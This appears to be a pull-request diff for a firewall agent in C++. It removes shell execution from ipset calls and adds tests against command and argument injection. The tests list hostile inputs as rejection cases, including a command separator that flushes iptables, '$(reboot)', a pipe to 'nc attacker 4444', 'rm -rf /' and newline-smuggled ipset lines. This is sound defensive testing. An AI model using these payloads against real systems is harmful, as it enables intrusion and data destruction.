+            IPSetErrorCode::KERNEL_ERROR, "Failed to save ipsets"
+        });
+    }
     return IPSetResult<void>();
 }
 
 IPSetResult<void> IPSetWrapper::restore(const std::string& filepath) {
     std::lock_guard<std::mutex> lock(mutex_);
 
-    std::string cmd = "ipset restore < " + filepath + " 2>&1";
-    if (m_dry_run) {
-        std::cout << "[DRY-RUN] Would execute: " << cmd << std::endl;
-        return IPSetResult<void>(); // Success in dry-run
-    }
-    auto [ret, output] = execute_command(cmd);
-
-    if (ret != 0) {
+    if (!validate_filepath(filepath)) {
         return IPSetResult<void>(IPSetError{
             IPSetErrorCode::KERNEL_ERROR,
-            "Failed to restore ipsets: " + output
+            "Invalid filepath for restore"
         });
     }
-
+    if (m_dry_run) {
+        std::cout << "[DRY-RUN] Would execute: " << kIpsetBin << " restore < "
+                  << filepath << std::endl;
+        return IPSetResult<void>(); // Success in dry-run
+    }
+    int ret = safe_exec_with_file_in({kIpsetBin, "restore"}, filepath);
+    if (ret != 0) {
+        return IPSetResult<void>(IPSetError{
+            IPSetErrorCode::KERNEL_ERROR, "Failed to restore ipsets"
+        });
+    }
     return IPSetResult<void>();
 }
 

--- a/firewall-acl-agent/tests/unit/test_config_loader_setname.cpp
+++ b/firewall-acl-agent/tests/unit/test_config_loader_setname.cpp
@@ -65,3 +65,17 @@ TEST(ConfigLoaderSetName, RejectsEmptyAndTooLong) {
     // 31 chars es el limite -> debe pasar.
     EXPECT_NO_THROW(ConfigLoader::validate_config(make_config(std::string(31, 'a'))));
 }
+
+// RED: CWE-88 — guion inicial se interpreta como flag de ipset.
+TEST(ConfigLoaderSetName, RejectsLeadingDash) {
+    EXPECT_THROW(ConfigLoader::validate_config(make_config("-X")),
+                 std::invalid_argument);
+    EXPECT_THROW(ConfigLoader::validate_config(make_config("-exist")),
+                 std::invalid_argument);
+}
+
+// RED: newline (defensa explícita, no incidental).
+TEST(ConfigLoaderSetName, RejectsNewline) {
+    EXPECT_THROW(ConfigLoader::validate_config(make_config("x\nadd evil 6.6.6.6")),
+                 std::invalid_argument);
+}

--- a/firewall-acl-agent/tests/unit/test_ip_cidr_validator.cpp
+++ b/firewall-acl-agent/tests/unit/test_ip_cidr_validator.cpp
@@ -1,0 +1,68 @@
+// test_ip_cidr_validator.cpp — DAY190 · DEBT-AUTONOMY-REACTOR-CWE78-001
+// Test STANDALONE del validador compartido. Dos ejes ortogonales:
+//   (A) SEGURIDAD: rechaza metacaracteres de shell, \n/\r/\t, y el bypass
+//       histórico "1.2.3.4/24\nadd evil ..." (la propiedad que cierra CWE-78).
+//   (B) ESTRUCTURAL: acepta IP/CIDR legítimos, rechaza prefijos fuera de rango.
+// Sin gtest: macro CHECK propio (compila en cualquier sitio, como add_newline_guard).
+#include "firewall/ip_cidr_validator.hpp"
+#include <cstdio>
+#include <string>
+
+using mldefender::firewall::is_valid_ip_cidr;
+
+static int g_fail = 0;
+static int g_checks = 0;
+#define CHECK(cond) do { ++g_checks; if (!(cond)) { \
+    std::printf("  FAIL L%d: %s\n", __LINE__, #cond); ++g_fail; } } while (0)
+
+#define REJECT(s) CHECK(is_valid_ip_cidr(std::string(s)) == false)
+#define ACCEPT(s) CHECK(is_valid_ip_cidr(std::string(s)) == true)
+
+int main() {
+    std::printf("=== test_ip_cidr_validator (DAY190 CWE-78) ===\n");
+
+    // ── (A) SEGURIDAD — vectores de ataque DEBEN ser rechazados ─────────────
+    REJECT("1.2.3.0/24; iptables -F");            // separador de comando
+    REJECT("1.2.3.4/24\nadd evil 6.6.6.6");       // bypass histórico (newline)
+    REJECT("1.2.3.4\nadd evil 6.6.6.6");          // newline sin slash
+    REJECT("1.2.3.4\r\n6.6.6.6");                  // CRLF
+    REJECT("1.2.3.4\t6.6.6.6");                    // tab
+    REJECT("$(reboot)");                           // sustitución de comando
+    REJECT("`reboot`");                            // backticks
+    REJECT("1.2.3.4 | nc attacker 4444");          // pipe + espacio
+    REJECT("1.2.3.4 -j ACCEPT");                   // espacio + flag (arg injection)
+    REJECT("10.0.0.0/8&&rm -rf /");                // encadenado
+    REJECT("10.0.0.0/8 ");                         // espacio final
+    REJECT(" 10.0.0.0/8");                         // espacio inicial
+
+    // ── (B) ESTRUCTURAL — legítimos aceptados ───────────────────────────────
+    ACCEPT("10.0.0.0/8");
+    ACCEPT("172.16.0.0/12");
+    ACCEPT("192.168.0.0/16");
+    ACCEPT("127.0.0.1");                           // host sin máscara
+    ACCEPT("8.8.8.8/32");
+    ACCEPT("::1");                                 // IPv6 loopback
+    ACCEPT("2001:db8::/32");                       // IPv6 CIDR
+    ACCEPT("fe80::1/128");
+
+    // ── (B) ESTRUCTURAL — malformados rechazados (corrección, no seguridad) ─
+    REJECT("10.0.0.0/33");                         // prefijo v4 fuera de rango
+    REJECT("2001:db8::/129");                      // prefijo v6 fuera de rango
+    REJECT("999.1.1.1");                           // octeto inválido
+    REJECT("10.0.0.0//8");                         // doble slash
+    REJECT("10.0.0.0/8/8");                        // doble slash separado
+    REJECT("10.0.0.0/");                           // slash sin prefijo
+    REJECT("");                                    // vacío
+    REJECT("notanip");                             // basura
+    // Comportamiento DOCUMENTADO (behavior-preserving, no endorsement): "/008" son
+    // 3 dígitos que parsean a 8 (en rango) → aceptado. inet_pton ya rechaza ceros a
+    // la izquierda EN LOS OCTETOS; el prefijo no los normaliza. Si en el futuro se
+    // quiere endurecer (rechazar ceros a la izquierda en el prefijo), es un cambio
+    // de comportamiento que va con su propio test, no aquí.
+    ACCEPT("10.0.0.0/008");                         // 3 dígitos, valor 8 en rango → aceptado
+
+    std::printf("--- %d checks, %d fallos ---\n", g_checks, g_fail);
+    if (g_fail == 0) std::printf("=== PASS: validador cierra CWE-78 + corrección estructural ===\n");
+    else             std::printf("=== FAIL: %d aserciones rotas ===\n", g_fail);
+    return g_fail == 0 ? 0 : 1;
+}

--- a/firewall-acl-agent/tests/unit/test_ipset_injection_integration.cpp
+++ b/firewall-acl-agent/tests/unit/test_ipset_injection_integration.cpp
@@ -1,0 +1,88 @@
+// test_ipset_injection_integration.cpp — DAY 188 / H-2 (INTEGRACION).
+// Demuestra END-TO-END que un IP malicioso NO inyecta comandos en 'ipset restore'.
+// A diferencia del unit (guardian aislado), prueba que el guardian esta CABLEADO en el
+// camino peligroso (add_batch -> restore file -> ipset restore) y que el efecto
+// observable de la inyeccion NO ocurre.
+// Authors: Alonso Isidoro Roman + Claude (Anthropic).
+//
+// REQUIERE: root + 'ipset' + kernel netfilter -> CORRE EN LA VM, NO en macOS.
+//   vagrant ssh -c 'cd /vagrant/build/firewall-acl-agent && sudo ctest -L e2e --output-on-failure'
+// Sin root -> GTEST_SKIP (no falla).
+//
+// CANARIO: si is_valid_ip dejara pasar "X/24\nadd <EVIL> ...", ipset restore crearia el
+// set <EVIL>. Aserto central: set_exists(<EVIL>) == false tras el intento.
+//
+// NOTA API: las lineas '<-- AJUSTA' usan has_value()/struct fields asumidos. Si tu API de
+// IPSetResult/IPSetConfig/IPSetEntry difiere, ajustalas. Los asertos set_exists/
+// get_entry_count (los PRIMARIOS) no dependen de eso y prueban el cierre por si solos.
+#include <gtest/gtest.h>
+#include "firewall/ipset_wrapper.hpp"
+
+#include <unistd.h>
+#include <string>
+#include <vector>
+
+using namespace mldefender::firewall;
+
+namespace {
+
+constexpr const char* kTargetSet = "argus_h2_target";
+constexpr const char* kEvilSet   = "argus_h2_evil";
+
+class IpsetInjection : public ::testing::Test {
+protected:
+    IPSetWrapper w_;
+
+    void SetUp() override {
+        if (::geteuid() != 0) {
+            GTEST_SKIP() << "requiere root + ipset (correr en la VM con sudo)";
+        }
+        w_.destroy_set(kTargetSet);
+        w_.destroy_set(kEvilSet);
+
+        IPSetConfig cfg;
+        cfg.name   = kTargetSet;
+        cfg.type   = IPSetType::HASH_IP;
+        cfg.family = IPSetFamily::INET;
+        auto r = w_.create_set(cfg);
+        ASSERT_TRUE(r.has_value()) << "no pude crear el set objetivo";  // <-- AJUSTA
+    }
+
+    void TearDown() override {
+        if (::geteuid() != 0) return;
+        w_.destroy_set(kTargetSet);
+        w_.destroy_set(kEvilSet);
+    }
+};
+
+TEST_F(IpsetInjection, AddBatchNewlineInjectionDoesNotCreateEvilSet) {
+    // [H-2 DAY188 IPSetEntry ctor fix] IPSetEntry exige IP en el ctor (no default-construct).
+    IPSetEntry evil{std::string("1.2.3.4/24\nadd ") + kEvilSet + " 6.6.6.6"};
+
+    auto res = w_.add_batch(kTargetSet, {evil});
+
+    EXPECT_FALSE(w_.set_exists(kEvilSet))
+        << "INYECCION: el IP malicioso creo el set " << kEvilSet;
+    EXPECT_EQ(w_.get_entry_count(kTargetSet), 0u);
+    EXPECT_FALSE(res.has_value()) << "add_batch deberia rechazar la IP malformada";  // <-- AJUSTA
+}
+
+TEST_F(IpsetInjection, DeleteBatchNewlineInjectionDoesNotCreateEvilSet) {
+    std::vector<std::string> ips = {
+        std::string("9.9.9.9/24\nadd ") + kEvilSet + " 7.7.7.7"
+    };
+    auto res = w_.delete_batch(kTargetSet, ips);
+
+    EXPECT_FALSE(w_.set_exists(kEvilSet))
+        << "INYECCION via delete_batch: aparecio " << kEvilSet;
+    EXPECT_FALSE(res.has_value());  // <-- AJUSTA
+}
+
+TEST_F(IpsetInjection, LegitimateIpStillAccepted) {
+    IPSetEntry good{std::string("203.0.113.10")};
+    auto res = w_.add_batch(kTargetSet, {good});
+    EXPECT_TRUE(res.has_value()) << "una IP valida deberia entrar";  // <-- AJUSTA
+    EXPECT_EQ(w_.get_entry_count(kTargetSet), 1u);
+}
+
+}  // namespace

--- a/firewall-acl-agent/tests/unit/test_ipset_is_valid_ip.cpp
+++ b/firewall-acl-agent/tests/unit/test_ipset_is_valid_ip.cpp
@@ -1,0 +1,86 @@
+// test_ipset_is_valid_ip.cpp — DAY 188 / H-2 (UNIT).
+// Verifica el guardian is_valid_ip de IPSetWrapper contra inyeccion en 'ipset restore'.
+// PURO: sin root, sin ipset, sin kernel. Solo logica de validacion.
+// Authors: Alonso Isidoro Roman + Claude (Anthropic).
+//
+// VECTOR H-2: la entrada cruda de is_valid_ip alimenta un fichero 'ipset restore'
+// (mini-lenguaje por lineas). Un '\n' inyectaba una linea add/del nueva. El bypass
+// historico validaba SOLO el trozo anterior al '/' y aprobaba el string completo
+// (CIDR), dejando pasar "1.2.3.4/24\nadd evil 6.6.6.6". Este test ATACA ese vector.
+//
+// is_valid_ip se movio a 'public' en DAY 188 (marcador en ipset_wrapper.hpp).
+#include <gtest/gtest.h>
+#include "firewall/ipset_wrapper.hpp"
+
+#include <string>
+
+using mldefender::firewall::IPSetWrapper;
+
+namespace {
+
+class IpsetValidIp : public ::testing::Test {
+protected:
+    IPSetWrapper w_;  // constructor por defecto, sin estado de kernel
+};
+
+// Entradas legitimas: deben ACEPTARSE.
+TEST_F(IpsetValidIp, AcceptsLegitimateAddresses) {
+    EXPECT_TRUE(w_.is_valid_ip("1.2.3.4"));
+    EXPECT_TRUE(w_.is_valid_ip("192.168.0.0/24"));
+    EXPECT_TRUE(w_.is_valid_ip("10.0.0.1/32"));
+    EXPECT_TRUE(w_.is_valid_ip("0.0.0.0/0"));
+    EXPECT_TRUE(w_.is_valid_ip("::1"));
+    EXPECT_TRUE(w_.is_valid_ip("2001:db8::/32"));
+    EXPECT_TRUE(w_.is_valid_ip("fe80::1/128"));
+}
+
+// EL caso estrella: bypass CIDR + newline (vector historico de H-2).
+TEST_F(IpsetValidIp, RejectsCidrNewlineInjection) {
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4/24\nadd evilset 6.6.6.6"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4/24\r\nadd evilset 6.6.6.6"));
+    EXPECT_FALSE(w_.is_valid_ip("::1/64\ndel argus_block 8.8.8.8"));
+}
+
+// Caracteres de control y separadores: RECHAZAR.
+TEST_F(IpsetValidIp, RejectsControlAndWhitespace) {
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4\n"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4\r"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4\t"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4 "));
+    EXPECT_FALSE(w_.is_valid_ip(" 1.2.3.4"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4 add evil"));
+}
+
+// Metacaracteres de shell (defensa en profundidad; el shell se retira aparte).
+TEST_F(IpsetValidIp, RejectsShellMetacharacters) {
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4;rm -rf /"));
+    EXPECT_FALSE(w_.is_valid_ip("$(reboot)"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4`id`"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4|nc attacker 4444"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4&&curl evil"));
+}
+
+// Argument injection (CWE-88): argumento que empieza por '-'.
+TEST_F(IpsetValidIp, RejectsLeadingDash) {
+    EXPECT_FALSE(w_.is_valid_ip("-exist"));
+    EXPECT_FALSE(w_.is_valid_ip("-!"));
+}
+
+// Prefijo CIDR fuera de rango o malformado.
+TEST_F(IpsetValidIp, RejectsBadCidrPrefix) {
+    EXPECT_FALSE(w_.is_valid_ip("10.0.0.1/33"));
+    EXPECT_FALSE(w_.is_valid_ip("10.0.0.1/999"));
+    EXPECT_FALSE(w_.is_valid_ip("::1/129"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4/"));
+    EXPECT_FALSE(w_.is_valid_ip("1.2.3.4/1/2"));
+}
+
+// Casos limite.
+TEST_F(IpsetValidIp, RejectsEmptyAndOverlong) {
+    EXPECT_FALSE(w_.is_valid_ip(""));
+    EXPECT_FALSE(w_.is_valid_ip(std::string(65, '1')));
+    EXPECT_FALSE(w_.is_valid_ip("999.999.999.999"));
+    EXPECT_FALSE(w_.is_valid_ip("deadbeef"));
+}
+
+}  // namespace

--- a/firewall-acl-agent/tests/unit/test_ipset_setname_injection_integration.cpp
+++ b/firewall-acl-agent/tests/unit/test_ipset_setname_injection_integration.cpp
@@ -1,0 +1,100 @@
+// test_ipset_setname_injection_integration.cpp — DAY 189 / H-2 NÚCLEO 1 (INTEGRACION).
+// Gemelo de test_ipset_injection_integration.cpp pero atacando el SET_NAME, no la IP.
+// Demuestra END-TO-END que un set_name con '\n' NO inyecta una línea en 'ipset restore'
+// y que el rechazo viene del guard is_valid_set_name (cableado en add_batch/delete_batch
+// ANTES de set_exists_unlocked), no de un SET_NOT_FOUND incidental.
+// Authors: Alonso Isidoro Roman + Claude (Anthropic).
+//
+// REQUIERE: root + ipset + kernel netfilter -> CORRE EN LA VM con sudo (label e2e).
+//   vagrant ssh -c 'cd /vagrant/firewall-acl-agent/build-debug && sudo ctest -L e2e --output-on-failure'
+// Sin root -> GTEST_SKIP.
+#include <gtest/gtest.h>
+#include "firewall/ipset_wrapper.hpp"
+
+#include <unistd.h>
+#include <string>
+#include <vector>
+
+using namespace mldefender::firewall;
+
+namespace {
+
+constexpr const char* kTargetSet = "argus_h2sn_target";
+constexpr const char* kEvilSet   = "argus_h2sn_evil";
+
+class IpsetSetNameInjection : public ::testing::Test {
+protected:
+    IPSetWrapper w_;
+
+    void SetUp() override {
+        if (::geteuid() != 0) {
+            GTEST_SKIP() << "requiere root + ipset (correr en la VM con sudo)";
+        }
+        w_.destroy_set(kTargetSet);
+        w_.destroy_set(kEvilSet);
+
+        IPSetConfig cfg;
+        cfg.name   = kTargetSet;
+        cfg.type   = IPSetType::HASH_IP;
+        cfg.family = IPSetFamily::INET;
+        auto r = w_.create_set(cfg);
+        ASSERT_TRUE(r.has_value()) << "no pude crear el set objetivo";
+    }
+
+    void TearDown() override {
+        if (::geteuid() != 0) return;
+        w_.destroy_set(kTargetSet);
+        w_.destroy_set(kEvilSet);
+    }
+};
+
+// ATAQUE PRINCIPAL: set_name con '\n' que intentaría inyectar 'add <EVIL>' en restore.
+TEST_F(IpsetSetNameInjection, AddBatchEvilSetNameDoesNotCreateEvilSet) {
+    const std::string evil_name =
+        std::string(kTargetSet) + "\nadd " + kEvilSet + " 6.6.6.6";
+    IPSetEntry good{std::string("203.0.113.10")};  // IP válida: el rechazo será por el NOMBRE
+
+    auto res = w_.add_batch(evil_name, {good});
+
+    // PRIMARIO (efecto): la inyección NO creó el set evil.
+    EXPECT_FALSE(w_.set_exists(kEvilSet))
+        << "INYECCION: el set_name malicioso creó " << kEvilSet;
+    // El set objetivo legítimo tampoco recibió la entrada (se rechazó antes).
+    EXPECT_EQ(w_.get_entry_count(kTargetSet), 0u);
+    // CONTRATO: rechazado, y por nombre inválido — NO por SET_NOT_FOUND incidental.
+    ASSERT_FALSE(res.has_value()) << "add_batch debería rechazar el set_name con '\\n'";
+    EXPECT_EQ(res.get_error().code, IPSetErrorCode::INVALID_SET_NAME)
+        << "el rechazo debe venir del guard is_valid_set_name, no de SET_NOT_FOUND";
+}
+
+// CWE-88: set_name '-X' (flag injection).
+TEST_F(IpsetSetNameInjection, AddBatchLeadingDashSetNameRejected) {
+    IPSetEntry good{std::string("203.0.113.10")};
+    auto res = w_.add_batch("-X", {good});
+    EXPECT_FALSE(res.has_value()) << "set_name '-X' debería rechazarse (CWE-88)";
+    EXPECT_EQ(res.get_error().code, IPSetErrorCode::INVALID_SET_NAME);
+    EXPECT_EQ(w_.get_entry_count(kTargetSet), 0u);
+}
+
+// delete_batch: mismo ataque por el otro camino.
+TEST_F(IpsetSetNameInjection, DeleteBatchEvilSetNameDoesNotCreateEvilSet) {
+    const std::string evil_name =
+        std::string(kTargetSet) + "\nadd " + kEvilSet + " 7.7.7.7";
+    std::vector<std::string> ips = {"9.9.9.9"};
+    auto res = w_.delete_batch(evil_name, ips);
+
+    EXPECT_FALSE(w_.set_exists(kEvilSet))
+        << "INYECCION via delete_batch: apareció " << kEvilSet;
+    ASSERT_FALSE(res.has_value());
+    EXPECT_EQ(res.get_error().code, IPSetErrorCode::INVALID_SET_NAME);
+}
+
+// Control: set_name legítimo sigue funcionando (no rompimos el camino feliz).
+TEST_F(IpsetSetNameInjection, LegitimateSetNameStillWorks) {
+    IPSetEntry good{std::string("203.0.113.20")};
+    auto res = w_.add_batch(kTargetSet, {good});
+    EXPECT_TRUE(res.has_value()) << "un set_name válido debería funcionar";
+    EXPECT_EQ(w_.get_entry_count(kTargetSet), 1u);
+}
+
+}  // namespace

--- a/firewall-acl-agent/tests/unit/test_parse_autonomy_cidr_injection.cpp
+++ b/firewall-acl-agent/tests/unit/test_parse_autonomy_cidr_injection.cpp
@@ -1,0 +1,47 @@
+// test_parse_autonomy_cidr_injection.cpp — DAY190 · DEBT-AUTONOMY-REACTOR-CWE78-001
+// Test de ATAQUE de integración: un CIDR malicioso en firewall.json["autonomy"]
+// DEBE hacer throw en ConfigLoader::parse_autonomy ANTES de que llegue a
+// autonomy_reactor::system("iptables ... -s <cidr>").
+//
+// REQUISITO DE VISIBILIDAD: parse_autonomy debe ser invocable desde el test.
+//   - Si es público/estático en ConfigLoader: este test compila tal cual.
+//   - Si es privado: o bien (a) declarar 'friend' el fixture, o (b) ejercitar
+//     vía ConfigLoader::load_from_file con un JSON completo (ver fallback abajo).
+// Alonso: ajusta el include/llamada al estado real de config_loader.hpp.
+#include <gtest/gtest.h>
+#include <json/json.h>
+#include "firewall/config_loader.hpp"
+
+using mldefender::firewall::ConfigLoader;
+
+static Json::Value autonomy_with(const std::vector<std::string>& cidrs) {
+    Json::Value j;
+    j["whitelist_cidrs"] = Json::Value(Json::arrayValue);
+    for (const auto& c : cidrs) j["whitelist_cidrs"].append(c);
+    return j;
+}
+
+// ATAQUE-1: separador de comando ';' → throw
+TEST(ParseAutonomyCidrInjection, RejectsSemicolonCommandChain) {
+    auto j = autonomy_with({"10.0.0.0/8", "1.2.3.0/24; iptables -F"});
+    EXPECT_THROW(ConfigLoader::parse_autonomy(j, "test.json"), std::runtime_error);
+}
+
+// ATAQUE-2: bypass histórico por newline → throw
+TEST(ParseAutonomyCidrInjection, RejectsNewlineInjection) {
+    auto j = autonomy_with({"1.2.3.4/24\nadd evil 6.6.6.6"});
+    EXPECT_THROW(ConfigLoader::parse_autonomy(j, "test.json"), std::runtime_error);
+}
+
+// ATAQUE-3: sustitución de comando → throw
+TEST(ParseAutonomyCidrInjection, RejectsCommandSubstitution) {
+    auto j = autonomy_with({"$(reboot)"});
+    EXPECT_THROW(ConfigLoader::parse_autonomy(j, "test.json"), std::runtime_error);
+}
+
+// CONTROL: config legítima NO lanza (no rompimos el camino feliz)
+TEST(ParseAutonomyCidrInjection, AcceptsLegitimateCidrs) {
+    auto j = autonomy_with({"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"});
+    EXPECT_NO_THROW(ConfigLoader::parse_autonomy(j, "test.json"));
+}
+

--- a/firewall-acl-agent/tests/unit/test_set_name_validator.cpp
+++ b/firewall-acl-agent/tests/unit/test_set_name_validator.cpp
@@ -1,0 +1,30 @@
+// test_set_name_validator.cpp
+// H-2 mov2: valida la allowlist standalone que protege add_batch/delete_batch.
+// Unit (sin root) → entra en test-all → gatea EMECAS.
+#include <gtest/gtest.h>
+#include "firewall/set_name_validator.hpp"
+using mldefender::firewall::is_valid_set_name;
+
+TEST(SetNameValidator, AcceptsLegitimate) {
+    EXPECT_TRUE(is_valid_set_name("blacklist"));
+    EXPECT_TRUE(is_valid_set_name("argus-v1_2025"));
+    EXPECT_TRUE(is_valid_set_name(std::string(31, 'a')));  // límite exacto
+}
+TEST(SetNameValidator, RejectsNewlineInjection) {
+    EXPECT_FALSE(is_valid_set_name("x\nadd evil 6.6.6.6"));
+    EXPECT_FALSE(is_valid_set_name("x\n"));
+}
+TEST(SetNameValidator, RejectsLeadingDash) {  // CWE-88
+    EXPECT_FALSE(is_valid_set_name("-X"));
+    EXPECT_FALSE(is_valid_set_name("-exist"));
+    EXPECT_TRUE(is_valid_set_name("a-b"));      // '-' interior OK
+}
+TEST(SetNameValidator, RejectsEmptyAndTooLong) {
+    EXPECT_FALSE(is_valid_set_name(""));
+    EXPECT_FALSE(is_valid_set_name(std::string(32, 'a')));
+}
+TEST(SetNameValidator, RejectsShellAndControlChars) {
+    EXPECT_FALSE(is_valid_set_name("set name"));
+    EXPECT_FALSE(is_valid_set_name("a;b"));
+    EXPECT_FALSE(is_valid_set_name(std::string("a\0b", 3)));  // NUL embebido
+}


### PR DESCRIPTION
Merge H-2 security debt audit (DAY188-190): set_name validation + shell removal en ipset_wrapper (NÚCLEO 1+3, safe_exec sin shell) + mitigación CWE-78 autonomy.whitelist_cidrs (punto 1, valida CIDR en parse_autonomy + is_valid_ip_cidr compartido). nosemgrep interino en autonomy_reactor:11 (DEBT-AUTONOMY-REACTOR-SAFEEXEC-002, post-FEDER). 73/73 tests verde, EMECAS++ 3 actos verde. H-2 PARCIAL — NÚCLEO 2 (comment en add_batch) PENDIENTE, no cerrar H-2 en BACKLOG.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Security Enhancements**
  * Added validation for IP addresses and CIDR notation to prevent injection attacks
  * Implemented set name validation to reject malicious input patterns
  * Enhanced configuration validation during startup to catch invalid values early

* **Testing**
  * Added dedicated firewall test targets for unit and integration testing
  * Expanded test coverage for injection attack prevention

* **Documentation**
  * Updated project backlog with security debt tracking items

<!-- end of auto-generated comment: release notes by coderabbit.ai -->